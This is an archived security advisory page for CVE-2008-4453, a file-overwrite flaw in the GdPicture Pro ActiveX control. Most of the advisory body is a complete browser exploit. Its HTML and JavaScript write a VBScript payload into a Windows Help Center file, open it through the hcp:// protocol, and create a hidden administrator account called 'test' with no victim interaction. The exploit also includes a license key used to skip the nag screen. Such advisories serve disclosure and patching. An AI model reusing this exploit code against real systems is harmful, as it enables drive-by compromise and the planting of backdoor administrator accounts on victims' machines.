|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | GdPicture Pro ActiveX (gdpicture4s.ocx) File Overwrite / Exec Exploit
|
SecurityAlert : 4355
CVE : CVE-2008-4453
CWE : CWE-264
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : EgiX
Published : 08.10.2008
Affected Software : | dspicture:light_imaging_toolkit:4.7.1
dspicture:pro_imaging_sdk:5.7.1 |
 Advisory Content : <!--
--------------------------------------------------------------------------
-------
GdPicture Pro ActiveX (gdpicture4s.ocx) Remote File Overwrite / Execution
Exploit
--------------------------------------------------------------------------
-------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.gdpicture.com/
ProgID...: GdPicture4S.Imaging
Description:
SaveAsPDF() method allow to create / overwrite file through
sFilePath argument. By using other arguments, such as sTitle,
an attacker could be inject html code and execute it using
the hcp:// protocol (tecnique discovered by rgod).
Also GdPicturePro5.Imaging is prone to this vulnerability,
but it doesn't implements the IObjectSafety interface.
Tested on Windows XP SP2 with IE 6/7
Object safety report:
Report for Clsid: {E8512363-3581-42EF-A43D-990E7935C8BE}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
[*] A special thanks goes to shinnai, for his patience :)
-->
<object classid='clsid:E8512363-3581-42EF-A43D-990E7935C8BE'
id='test'></object>
<script language='javascript'>
var cmd = "cmd /c net user test test /add & net localgroup Administrators
test /add";
var outFile =
"c:\\windows\\pchealth\\helpctr\\system\\errors\\badurl.htm";
var BMP = "\x42\x4d\x42\x00\x00\x00\x00\x00\x00\x00\x3e" +
"\x00\x00\x00\x28\x00\x00\x00\x01\x00\x00\x00" +
"\x01\x00\x00\x00\x01\x00\x01\x00\x00\x00\x00" +
"\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\xff\xff\xff\x00\x80\x00\x00\x00";
var sc = "<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8'
id='wsh'><\/object>" +
"<script language='vbscript'>wsh.Run \"" + cmd + "\",
SW_HIDE<\/script>";
test.SetLicenseNumber("0317955669879948884162456"); // only to avoid the
nag screen
test.CreateImageFromString(BMP);
if (test.SaveAsPDF(outFile, sc, "", "", "")) location.href =
"hcp://system/errors/badurl.htm";
</script>
References :
http://www.securityfocus.com/bid/31504
http://www.milw0rm.com/exploits/6638
http://www.frsirt.com/english/advisories/2008/2708
http://secunia.com/advisories/31966
http://secunia.com/advisories/31898
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|